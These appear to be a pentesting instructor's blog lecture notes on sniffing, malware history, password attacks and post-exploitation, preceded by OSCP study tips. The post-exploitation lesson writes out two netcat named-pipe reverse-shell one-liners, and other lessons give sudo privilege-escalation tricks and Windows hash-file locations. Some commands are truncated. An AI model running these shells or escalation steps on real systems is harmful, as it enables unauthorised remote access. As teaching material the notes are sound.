Another important piece of advice, if you already work in security or pentesting, is don’t let your expertise mislead you.  For instance, the majority of my job is web app pentesting, so obviously I’m pretty well-versed in it.  The OSCP doesn’t expect you to know much beyond very simple XSS, SQL injection, and LFI/RFI.  I wasted hours of my first exam chasing what I thought must be a web app exploit that obviously wasn’t there and felt foolish when I realized it after I failed the first time.  I could see folks who come to this from a development background having a similar overanalysis problem.

Another piece of advice, without giving away too much, is to go through the entire lab guide and all the exercises.  Let’s just say that, on the exam, you might come across something that you had to do in the lab guide that you didn’t really do in the labs.  You wouldn’t want to be surprised by anything.


OSCP is a great, fun experience.  Look at the syllabus and see what sort of things you could be studying up on before you sign up so that you can spend the bulk of your time hacking shit in the lab.  ENUMERATE ENUMERATE ENUMERATE.  Treat the OSCP like any other exam (manage time, move on if you get stuck and come back to it later, rest and eat when you need it).  Don’t let the experiences you bring bias you too much on a particular problem.

I hope these tips can help you make the most of your PWK lab time and pass your exam.  If you “try harder” and keep striving, you’ll conquer all the challenges, learn a lot about pentesting, and have a great time.

If you want to see the shiny new certificate I got, check out this post.

CNS 320 Lesson 9 – Sniffing

Lesson 9 – Sniffing

Screen Shot 2016-02-06 at 9.59.41 AM.png

Screen Shot 2016-02-06 at 9.59.45 AM.png

  • In the old days, most LANs used hubs.  When a packet would come into the LAN, the hub would send it to everyone.  If the packet said its destination was your network card’s MAC address, you would take it and process it.  If it *didn’t* have your MAC, you were supposed to politely ignore it.  Yeah…you can guess how this ends.
  • Nowadays, LANs use “switches” instead of hubs.  Switches are smarter and keep track of which MAC address is hooked into which port on the switch.  That way, it only sends the packet to the computer it’s intended for.  This makes sniffing other people’s traffic more difficult…but we’ll see how attackers can get around this.
  • NOTE: later, we’ll talk more in depth about wireless networks.  Since they use radio signals that propagate out in all directions, they inherently have many of the same problems as hubs do.

Screen Shot 2016-02-06 at 9.59.46 AM.png

  • Rlogin or rsh is an old remote access protocol for logging into Linux/Unix servers.  It and telnet are both plain-text and have mostly been replaced by SSH, which is encrypted.  Rlogin/rsh usually operates on TCP port 513.
  • NNTP = Network News Transfer Protocol, the protocol used for sharing Usenet posts.  TCP 119 is reserved for it.

Screen Shot 2016-02-06 at 12.36.20 PM.png

  • Network taps sit inline between switches, routers, and/or hosts and listen in on the packets being sent.  Troubleshooting tools and intrusion detection systems (IDS) are two types of tools that often employ taps in order to monitor the network.
  • Port mirroring (SPAN as it’s called in Cisco products) is a feature of the router or switch itself and can more intelligently filter what data to intercept

Screen Shot 2016-02-06 at 9.59.49 AM.png

Screen Shot 2016-02-06 at 9.59.50 AM.png

Screen Shot 2016-02-06 at 9.59.51 AM.png

Screen Shot 2016-02-06 at 9.59.52 AM.png

Screen Shot 2016-02-06 at 9.59.53 AM.png

Screen Shot 2016-02-06 at 10.00.06 AM.png

Screen Shot 2016-02-06 at 10.00.07 AM.png

Screen Shot 2016-02-06 at 10.00.08 AM.png

Screen Shot 2016-02-06 at 10.00.10 AM.png

  • Intranet Spoofing: Acting as a device on the same internal network
  • Internet Spoofing: Acting as a device on the Internet
  • Proxy Server DNS Poisoning: Modifying the DNS entries on a proxy server so the user is redirected to a different host system
  • DNS Cache Poisoning: Modifying the DNS entries on any system so the user is redirected to a different host

Screen Shot 2016-02-06 at 10.00.11 AM.png

Screen Shot 2016-02-06 at 10.00.12 AM.png

Screen Shot 2016-02-06 at 10.00.16 AM.png

  • Ping method: if you suspect a certain IP address is a sniffer, send it a ping packet with its valid IP addresses but the wrong MAC address.  If it responds anyway, it’s the sniffer.
  • ARP method: send out a non-broadcast ARP message. Next, we send a broadcast ping packet with our IP address but a different MAC address. Only a machine that has our correct MAC address from the sniffed ARP frame will be able to respond to our broadcast ping request.
  • Source-route method: send out a ping, but with a loose-source route so that it will be routed through another machine on your network segment. Most computers won’t route packets like this, but if you get a response, it’s like the machine is running in promiscuous mode.
  • Decoy method: this method involves sending false information over the wire (such as fake username/password combos) and seeing if anyone acts on it.
  • Reverse DNS method: many sniffer programs will automatically perform reverse DNS lookups of the addresses we sniff. If you start seeing two machines have remarkably similar DNS traffic, one could be sniffing the other.
  • Latency method: flood the network with traffic.  The sniffer will start to creak under the strain.  If you see a machine on the network suddenly having very high latency when responding to requests, it might be the one sniffing.
  • TDR: TDRs are tools for testing electrical cables.  They are capable of detecting hardware taps and sniffers.

Screen Shot 2016-02-06 at 10.00.17 AM.png

  • Port security, or MAC filtering, will lock a specific MAC address to a specific port on a switch.  This way, it prevents ARP spoofing.
  • You could also go to the trouble of making a static ARP table and ignoring any spoofers sending out unsolicited APR replies.
  • The most common method is to use network IDS/IPS products that look for suspicious traffic, like floods of unsolicited ARP replies or large volumes of DNS traffic.
  • The best way to deal with sniffers is to make them pointless.  If you use public-key encryption (like TLS), it won’t matter if you’re being sniffed; the eavesdropper won’t be able to read your packets anyway.

Screen Shot 2016-02-06 at 10.00.18 AM.png

  • In the labs for this lesson, I would have my students work through a tcpdump tutorial ( Most of them were already very familiar with Wireshark, but few had used tcpdump on the command line.
  • After that, we’d pair up and play with sniffing traffic.  I would start them out with the relatively-simple arpspoof utility and then start using the more advanced ettercap.


CNS320 Lesson 8 – Malware

Lesson 8 – Malware

Screen Shot 2016-01-24 at 2.01.47 PM.png

  • dr-mario-virus-dancing-gif-davesgeekyideas.gif

Screen Shot 2016-01-24 at 1.56.39 PM.png

Screen Shot 2016-01-24 at 1.56.40 PM.png

  • Blackmail and extortion runs the gamut from encrypting your files and holding them ransom or stealing nude pics and making you pay the attacker not to blast them all over the internet

Screen Shot 2016-01-24 at 1.56.41 PM.png

Screen Shot 2016-01-24 at 1.56.42 PM.png

  • Don’t rely on slowdown and excessive CPU/RAM usage as your prime indicator…that’s usually just a sign that your computer is old piece of shit

Screen Shot 2016-01-24 at 1.56.43 PM.png

Screen Shot 2016-01-24 at 1.56.45 PM.png

  • The malware author first designs the malware
  • Then the malware replicates across networks and machines to victim computers
  • The malware then launches and performs whatever action is intended (holding files ransom, stealing sensitive info, installing keystroke loggers, enrolling the machine in a botnet, just trashing it, etc.)
  • Eventually, researchers and antivirus companies detect the virus in the wild, categorize it, and start building signatures for it
  • When that signature info is incorporated into AV products, antivirus can know recognize it…
  • …and start to eliminate the malware

Screen Shot 2016-01-24 at 1.56.46 PM.png

  • Boot sector viruses target the boot sector or Master Boot Record of hard drives, bootable floppies, CDs, USBs, etc.
  • File viruses infect files (duh).  Adobe PDF is a popular vector.
  • Program viruses infect executables.
  • Network viruses (according to the book) are viruses that spread over the network, usually via email.  It’s not really clear how this is different from a worm.
  • Source code viruses actually look for C, Java, or other source code on a machine and alter it to include malicious code.  These viruses are extremely rare.
  • Macro viruses, the bane of the 90’s, are written in the “macro language” of another application…such as an embedded macro in a Word or Excel document.  The Melissa virus was one of the earliest and most widespread of macro viruses.  Macro viruses have mostly tailed off in popularity.
  • Multipartite viruses utlize more than one of the above methods to infect and spread

Screen Shot 2016-01-24 at 1.56.47 PM.png

Screen Shot 2016-01-24 at 1.56.48 PM.png

  • TSR viruses usually load themselves into memory and then delete any files or binaries they used to get there in the first place.
  • Cavity viruses hide in the unused whitespace inside certain applications and file formats.
  • A tunneling virus is a virus that attempts to intercept anti-virus software before it can detect malicious code. A tunneling virus launches itself under anti-virus programs and then works by going to the operating system’s interruption handlers and intercepting them, thus avoiding detection. Interception programs, which remain in the background of an operating system and catch viruses, become disabled during the course of a tunneling virus.
  • Stealth viruses also use various means to evade antivirus, by means of hooking system calls and interrupts, changing them so that it doesn’t alert AV software.  Difference between it and a tunneling virus is that stealth viruses intercept everything, but tunneling viruses intercept only AV system calls.
  • Camouflage viruses crudely try to masquerade as a legitimate program.  They’re trivial for AV to find and kill.
  • Encrypted viruses come with a decryption module and then try to encrypt the bulk of the viral code and any infected binaries in order to evade signature-based AV.
  • Polymorphic and metamorphic viruses are similar in that both modify the underlying virus code with each iteration.  The difference is that metamorphic code will randomly re-write every part of itself, whereas polymorphic viruses usually have a mutation engine (or decryption module) that stays untouched and unmodified, making polymorphics easier to catch by AV.

Screen Shot 2016-01-24 at 1.56.49 PM.png

Screen Shot 2016-01-24 at 1.56.52 PM.png

Screen Shot 2016-01-24 at 1.56.53 PM.png

Screen Shot 2016-01-24 at 1.56.54 PM.png

Screen Shot 2016-01-24 at 1.56.55 PM.png

  • Creeper was an experimental, benign self-replicating program unleashed on DEC PDP-10 computers running the TENEX operating system.  Reaper was a program written to get rid of Creeper instances, making it the first anti-virus.
  • Rabbit was the first example of a “fork bomb,” a virus that keeps forking new processes of itself until it uses up all the system resources and DoS’s the box
  • Fred Cohen was an engineering student at the University of Southern California who first coined the term “computer virus” with a proof-of-concept program and an accompanying research paper in 1983.
  • Elk Cloner was invented as a prank by teenage computer enthusiast Rick Skrenta.  It was a boot sector virus that infected Apple II floppy disks.  It was harmless, only displaying a taunting message to users, but it could occasionally ruin disks if it accidentally overwrote the wrong part of a floppy’s boot sector.
  • Brain was the first boot sector virus to infect MS-DOS machines, written by Pakistani programmers and brothers Basit and Amjad Alvi.  It was originally written as an anti-piracy program, but unexpectedly spread to other disks.  Mikko Hyponnen of F-Secure tracked down the two brothers in 2011, who still own an IT business in Lahore.
  • The Morris Worm was unleashed on the ARPANet by then Cornell University student Robert Tappan Morris.  Morris said he did it as a way to gauge the size of the Internet, not to cause harm.  The worm spread using several possible methods; it would try to exploit known vulnerabilities in common Unix programs like sendmail, finger, and rlogin and would also try to remotely login by guessing weak passwords.  The worm itself was harmless; it would simple get into a new machine, then look for network neighbors and spread to them too.
  • Morris had written it so that, if it detected there was already a copy of the worm installed, it wouldn’t reinfect……except every seventh time, it would install another copy of itself, ostensibly as protection against false positives or people trying to fool his worm and keep it from spreading.  With enough time, as the worm reinfected the same hosts continuously, it turned into a massive widespread DoS attack.
  • Morris became the first person convicted under the then-new CFAA law.  He eventually served three years probation, did 400 hours of community service, and was fined over $10,000.
  • Morris went on to found several Silicon Valley start-ups and is currently a tenured professor at MIT.

Screen Shot 2016-01-24 at 1.56.56 PM.png

  • A floppy disk of the Morris worm’s source code in the Computer History Museum in Mountain View, CA

Screen Shot 2016-01-24 at 1.56.57 PM.png

  • Pretty sure Michaelangelo was the inspiration for the “Da Vinci virus” in the movie Hackers

Screen Shot 2016-01-24 at 1.56.59 PM.png

  • Code Red worm exploited flaws in Microsoft IIS web servers, Nimda was another devastating worm/file infector combo that used other means to propagate, but could exploit backdoors left behind by old Code Red infections
  • Beast was one of the first reverse shell RATs for Windows.
  • Slammer was a DoS worm that exploited a buffer overflow in Microsoft SQL Server and Desktop Engine to crash Windows machines.
  • Blaster spread via a buffer overflow in the RPC service on TCP port 135 and would try to use infected hosts to DDoS the Windows Update website with a SYN flood.
  • Sasser was another big DoS worm that exploited LSASS (the Local Security Authority Subsystem Service) in Windows 2000 and XP
  • Zeus is one of the longest-lived bank credential-stealing Trojans, keeping alive through changes and variants such as the newer GameOver ZeuS offshoot and merging code with the SpyEye trojan.
  • Conficker was a worm that exploited numerous Windows infections
  • Stuxnet and Duqu may very well be the first and some of the most successful cyberweapons. Leaks from inside the US government allege it was developed as part of a US/Israeli joint operation to target and destroy Iranian uranium enrichment centrifuges.
  • Blackhole is an example of an “exploit kit” or “crimeware kit,” that allows low-skilled cybercriminals to put together bank credential-stealing or botnet-enrolling trojans of their own.
  • Flashback made waves as one of the first widespread Mac OS X pieces of malware.  It used a vulnerability in Java and spread through malicious websites.
  • Flame is another cyberweapon, supposedly developed by the NSA and Israel.
  • CryptoLocker kicked off the era of encryption ransomware.  It and it’s copycats would infect a machine, encrypt all the user’s personal files, then hold them for ransom.  If the user paid the ransom (usually an amount set in an anonymous cryptocurrency like Bitcoin), the malware creator would give them the decryption key so they could access their files again.

Screen Shot 2016-01-24 at 1.57.00 PM.png

  • Glance over this list, because you may see a question or two about suspicious ports on your exam.

Screen Shot 2016-01-24 at 1.57.02 PM.png

Screen Shot 2016-01-24 at 1.57.03 PM.png

  • Air-gapping means the machine is not connected to other machines over network connections.


CNS320 Lesson 7 – Post-Exploitation

Lesson 7 – Post-Exploitation

Screen Shot 2016-01-23 at 10.54.53 PM.png

Screen Shot 2016-01-23 at 10.54.54 PM.png

Screen Shot 2016-01-23 at 10.54.55 PM.png

Screen Shot 2016-01-23 at 11.15.42 PM.png

Screen Shot 2016-01-23 at 10.54.58 PM.png

Screen Shot 2016-01-23 at 10.54.59 PM.png

Screen Shot 2016-01-23 at 10.55.00 PM.png

Screen Shot 2016-01-23 at 10.55.01 PM.png

Screen Shot 2016-01-23 at 10.55.03 PM.png

  • Netcat is a tool you will need to get very comfortable with as a pentester.  Netcat is a simple but powerful utility that will allow you to listen on or transmit data over TCP or UDP ports.  It’s built into almost every Linux or Unix OS (including OS X) and versions are availble for Windows and other OS’s too.
  • Some of the popular clones of netcat include ncat (which is part of the Nmap Project and comes bundled with it), socat, CryptCat (which can SSL-encrypt your traffic), and many others

Screen Shot 2016-01-23 at 10.55.04 PM.png

Screen Shot 2016-01-23 at 10.55.05 PM.png

Screen Shot 2016-01-23 at 10.55.07 PM.png

Screen Shot 2016-01-23 at 10.55.08 PM.png

Screen Shot 2016-01-23 at 10.55.12 PM.png

  • Steganography is one of those things you learn in security classes and is fun for hacker CTFs…but I’m not really sure how much it gets used by real attackers.  Or even pentesters on engagements, for that matter.

Screen Shot 2016-01-23 at 10.55.14 PM.png

Screen Shot 2016-01-23 at 10.55.15 PM.png

Screen Shot 2016-01-23 at 10.55.17 PM.png

Screen Shot 2016-01-23 at 10.55.18 PM.png

  • Stego-only attack: you only have the medium with the hidden data in it
  • Known-cover attack: you have a copy of the original medium BEFORE data was hidden in it and a copy of it AFTER data is hidden
  • Known-message attack: you have the medium with hidden data in it and you know what the hidden message is (can determine the steg algorithm with this info)
  • Known-stego attack: you know the steg method used and you have access to the original and modified medium
  • Chosen-stego attack: you have access to different steg tools and you try each them and look for similarities to determine which method was used for the file you’re analysing
  • Chosen-message attack: similar to the above, but using the same message in different tools to look for patterns or signatures

Screen Shot 2016-01-23 at 10.55.20 PM.png

Screen Shot 2016-01-23 at 10.55.22 PM.png

Screen Shot 2016-01-23 at 10.55.23 PM.png

Screen Shot 2016-01-23 at 10.55.25 PM.png

Screen Shot 2016-01-23 at 10.55.26 PM.png

  • The process might get far along, but eventually the program being used to trash the disk will delete itself and stall out, so there will still be something for forensic investigators to pick at…though who knows just what will remain.

Screen Shot 2016-01-23 at 10.55.27 PM.png

  • Also, besides the netcat man page, there are some good recipes buried in the /usr/share/doc/netcat-traditional/ directory on Kali.  Check out README.Debian and README.gz.  Also, there are some very interesting shell scripts that use netcat to do everything from IRC to acting as a crude web server down in the examples subdirectory.
  • Besides all the different variants, there are two mainstream versions of netcat: netcat-traditional and netcat-openbsd.  The netcat-openbsd is the most common version you’ll find that comes installed on Debian, Ubuntu, Redhat, and various other Linux distributions.  The main difference is that the OpenBSD variant has had the “-e” option removed, as a measure to prevent hackers leaving backdoors.
  • Fortunately, there are two different options for sending out a reverse shell without having to use the “-e” flag:
    1.)     mknod backpipe p && nc <remote server> <port> 0<backpipe | /bin/bash 1>backpipe
    2.)     mkfifo pipe && nc <remote serve> <port> < pipe | /bin/bash &> pipe         <——– this one is better, because it will also pipe stderr to you (so you can see error messages)


This is the point in the class where I would start doing actual CTF challenges with the students.  What I usually did was create several VMs on the class server (I didn’t need much horsepower; an old laptop running Linux Mint with about 4GB of RAM sufficed just fine) and assign one to each student for them to hack.  I had pretty small classes, so I this was doable.  I would give them hints, answer questions, guide them in the right direction, get them to help each other out, etc. until they finally solved it.

But for you reading along at home, you should now know enough to try to tackle some of these CTF VMs yourself.  Here are the first few I started them out on:

You can easily download the ISO images and run them in VMware or VirtualBox.  I urge to try to solve them on your own.  The De-ICE ones do have a hint page in the target machine’s website.  If you get really desperate, you can always look at the walkthroughs on their respective VulnHub pages.

Good luck!

CNS320 Lesson 6 – Exploitation

Lesson 6 – Exploitation

Screen Shot 2016-01-23 at 1.37.29 PM.png

Screen Shot 2016-01-23 at 1.37.31 PM.png

Screen Shot 2016-01-23 at 1.37.32 PM.png

Screen Shot 2016-01-23 at 1.37.33 PM.png

Screen Shot 2016-01-23 at 1.37.34 PM.png

  • If you have the ability to listen to traffic on the network (on an open WiFi access point or an old network using hubs, for instance), you could easily find poorly-protected passwords going over the wires.  Services like telnet, FTP, and badly-written websites can transmit password in plain-text over unencrypted channels.
  • The other option is, if the network doesn’t allow you sniff all traffic, then make the traffic come through you!  A man-in-the-middle (MiTM) attack means you get in between your victim and the target you want to access, so you can sniff password or other sensitive info.  More on this subject to come.
  • A compliment to a MiTM attack, or perhaps other attacks we’ll talk about later like cross-site scripting (XSS) or pass-the-hash, is to try a replay attack.  If a system has poor session management or authentication processes, you might be able to capture a hash, access token, session cookie, or similar and just send it to the server, letting you in without ever having to guess or crack your victim’s password.
  • An active online attack would be password guessing, where you connect to the system, web app, etc. and try different passwords.

Screen Shot 2016-01-23 at 1.37.37 PM.png

  • Offline attacks mean that you’ve captured  password hashes, either by stealing the authentication database from a web app, or the Windows SAM file, the Linux shadow file, or similar.  The passwords are in stored in a cryptographic hash format, meaning they’ve been run through a one-way algorithm to generate a fix-length hash (which usually looks like hexadecimal gobbledegook).  The way to crack hashes is to run different words or strings of characters through the same hashing algorithm (such as NTLM for Windows, MD5 for most web apps, etc.), and if you get a match against the stolen hash, then you know that word or string of characters is the password.
  • A dictionary attack is just like what it says: take a dictionary of words, common passwords, or what-have-you and throw it against the system.  The most common and the most effective type of attack.  Kali Linux has several dictionaries in the /usr/share/wordlists directory.  One of the most widely-used is the RockYou list, which is a dump of millions of real-world passwords that were used by users of a popular gaming site that was compromised in 2009.  You’ll also find other wordlists and dictionaries in other app’s directories in the /usr/share tree.
  • Brute-forcing is trying every possible character combination until you find the password.  In essence, you start at “a”, then try “b”, eventually you work up to “aa”, and so on.  In the end, brute forcing will always win…it’s simple a matter of whether it’ll take minutes or centuries to finally guess your password.
  • Hybrid attacks are anything in between.
  • Rainbow tables (AKA precomputed hashes) are just huge lists of millions or billions of different password hashes for you to throw against a certain system (like a list of every possible NTLM hash to try against Windows or every MD5 hash to try against a web app’s stolen password database).  The idea is that you spend the time up-front generating all the possible hashes so that you can then quickly use it against multiple targets.
  • Syllable attacks are a combination of dictionary and brute-forcing, where you might try different permutations of dictionary words (like “password” > “password1” > “p@ssw0rd” etc.)
  • Rule-based attacks are were you have some sort of intelligence about the password policy.  For example, you know that passwords on the system have to be between 8 and 12 characters long, have to have one upper-case and one lower-case letter, and only allow “!” or “@” for special characters.  You could then tailor the attack to only try out guesses that match those rules, e.g., you wouldn’t waste time trying a password like “passwd” or “pa$$word”
  • A distributed attack could be any of the above, except that instead of just one computer trying to crack the password, multiple machines in parallel might each be trying to crack it, each other them divvying up the workload.  This is usually facilitated with a botnet.

Screen Shot 2016-01-23 at 1.37.38 PM.png

  • Shoulder surfing is when an attacker tries to get close to a victim as they are inputing their password and watch the keys pressed.
  • Keyboard sniffers are hardware- or software-based tools that capture the keystrokes a user puts in, which an attacker can then read and learn the victim’s password
  • To paraphrase Kevin Mitnick, why spend hours cracking hashes when users will just give you their passwords?  We’ll cover social engineering more later.

Screen Shot 2016-01-23 at 1.37.40 PM.png

  • John the Ripper is one of the oldest and most widely-used password cracking tools.  It can quickly perform dictionary or brute-force attacks on password hashes.
  • Hashcat is a newer program that offers various types of dictionary, brute-force, and hybrid attack options.  It can also utilize the GPU graphics cards in computers for extremely-fast cracking.
  • Cain and Abel is a Windows-only all-in-one hacking tool.  Password hash cracking is one of its many features.
  • Ophcrack and L0phtcrack are both famous Linux-based tools for cracking Windows LM and NTLM hashes
  • RainbowCrack is, you guessed, used to generate rainbow tables and crack hashes against them
  • There are many other password cracking tools out there, many tailored to specific sorts of password hash formats.

Screen Shot 2016-01-23 at 1.37.41 PM.png

  • THC Hydra is the old gold-standard for brute forcing everything from SSH to FTP to online forms to Cisco appliances.  It takes a user or list of users, then a wordlist of potential passwords, and will go to work brute-forcing logins.
  • Medusa is a work-alike to Hydra that’s meant to be faster and more stable.
  • CeWL is a custom wordlist generator.  It can spider a target’s website(s) and use the information it gathers to build customized wordlists of potential passwords to try out.
  • Burp Suite, WebScarab, and ZAP are all HTTP/S intercept proxies that can be used to attack web logins.  We’ll talk more about them in our lessons on web vulnerabilities.

Screen Shot 2016-01-23 at 1.37.42 PM.png

Screen Shot 2016-01-23 at 1.37.44 PM.png

  • The SAM is well-known for having local usernames and hashes stored in it; if you also have the SYSTEM and SECURITY hives with it, you also get access to cached Active Directory hashes, password history, and other valuable intel
  • Active Directory Domain Controllers have a domain-wide password hash database called NTDS.dit.  If you get NTDS.dit, you have the hashes of every user in the domain.
  • SAM, SYSTEM, and SECURITY are stored in C:\WINDOWS\system32\config\ and the NTDS.dit file is stored in C:\WINDOWS\ntds\
  • You can’t normally get to the SAM, SYSTEM, and SECURITY files while a Windows machine is turned on, but you can steal them out of memory or from Volume Shadow Service (VSS) backup copies, if they exist.  If you have physical access, you can turn the machine off, boot it from a Linux LiveCD or LiveUSB, mount the Windows hard drive, and steal the files.

Screen Shot 2016-01-23 at 1.37.45 PM.png

Screen Shot 2016-01-23 at 1.37.46 PM.png

Screen Shot 2016-01-23 at 1.37.48 PM.png

Screen Shot 2016-01-23 at 1.37.49 PM.png

  • There are lots of tools that will try to dump the SAM file, either out of memory or out of Volume Shadow Service (VSS) backup copies, including pwdump, fgdump, and others.  There’s a cat-and-mouse game between these tools and antivirus detection engines, so they’re constantly being updated, changed, or new ones written.
  • chntpw is a Linux utility you can used when you mount a hard drive with Windows on it to steal hashes or overwrite them with your own
  • NTDSXtract is for stealing hashes from NTDS.dit files
  • Kon-Boot used to be a free tool that is now for-pay, unfortunately.  You would boot it from a CD or USB stick, it would run first, then it would boot Windows and act as a man-in-the-middle rootkit, allowing you to completely bypass the password screen and gain instant access to a Windows workstation.
  • Volume Shadow Service (VSS) is a Windows service that takes backup snapshots of the running Windows OS.  If you have admin-level privileges, you can often find backup copies of the SAM and other important files in here.  There are numerous tools available to automate this.
  • As mentioned, you can just boot Linux from a CD or USB on the victim machine, mount the Windows drive, and steal the file that way

Screen Shot 2016-01-23 at 1.37.50 PM.png

  • WMIC = Windows Management Instrumentation Command-Line
  • Example: “wmic qfe get Caption,Description,HotFixID,InstalledOn” would list out all the hotfix and security patches applied to that Windows install

Screen Shot 2016-01-23 at 1.37.51 PM.png

Screen Shot 2016-01-23 at 1.37.53 PM.png

Screen Shot 2016-01-23 at 1.37.54 PM.png

Screen Shot 2016-01-23 at 1.37.56 PM.png

Screen Shot 2016-01-23 at 1.37.57 PM.png

  • As you’ll see, there’s a lot of things that can go wrong with Linux, especially in regards to privilege escalation via setuid or sudo

Screen Shot 2016-01-23 at 1.37.58 PM.png

Screen Shot 2016-01-23 at 1.38.00 PM.png

Screen Shot 2016-01-23 at 1.38.01 PM.png

Screen Shot 2016-01-23 at 1.38.02 PM.png

  • When Linux systems crash, they often “dump core” and dump the contents of RAM into a file, for the purpose of diagnosing what caused the crash.
  • Users of SSH will have a hidden directory called .ssh automatically created in their home folder.  This could contain keyfiles that they use to login to other servers.

Screen Shot 2016-01-23 at 1.38.04 PM.png

  • Cron is the task scheduling system used by most Linux/Unix systems.  Unfortunately, cron jobs can be all over the place, depending on who or what is scheduling them; hence all the different places you have to look.

Screen Shot 2016-01-23 at 1.38.05 PM.png

  • Hence why dd is sometimes said to stand for “disk destroyer” 🙂

Screen Shot 2016-01-23 at 1.38.06 PM.png

Screen Shot 2016-01-23 at 1.38.08 PM.png

Screen Shot 2016-01-23 at 1.38.09 PM.png

Screen Shot 2016-01-23 at 1.38.10 PM.png

Screen Shot 2016-01-23 at 1.38.11 PM.png

  • Example: you hacked an account with sudo rights, but all it can do is use sudo to execute a script called “”.  Just delete the script (rm, then link the old name to a shell (ln /bin/bash, then run it with sudo permission (sudo ./ and bam, you have root!
  • Another one is if you’re granted sudo rights to some sort of program that can edit files, like nano, vim, or even a hex editor.  You can then run it and change the sudoers file to expand that compromised account’s rights or grant rights to another account of your choosing.

Screen Shot 2016-01-23 at 1.38.13 PM.png

  • Normally, in Linux and Unix, when you run a program, it runs with your own level of permisisons.  But some programs need to run at a higher level of privilege in order to use special OS services, like the “mount” utility that has to interact with the kernel to mount new filesystems.  Instead of giving everyone root permissions, you can just give the program the “setuid” access right so that when normal users run it, it’s as if root was running.
  • An example of exploiting this would be if a text editor owned by root had the setuid attribute set.  If you ran it, you could then go edit the sudoers file, open up and read the shadow file, or otherwise get access to sensitive files beyond your access level.

Screen Shot 2016-01-23 at 1.38.14 PM.png

  • If you always type “ls –al” when listing directory contents, you might make an alias of “ll” or “lal” or even just “ls” for that command and save it to your shell’s config file (usually .profile or .bashrc or similar).  You could also use alias to trick users into executing rootkitted version of apps like top or free to hide your activity.
  • Chroot is in every Unix-like distro.  Jail is much stricter and is mostly seen in BSD distributions.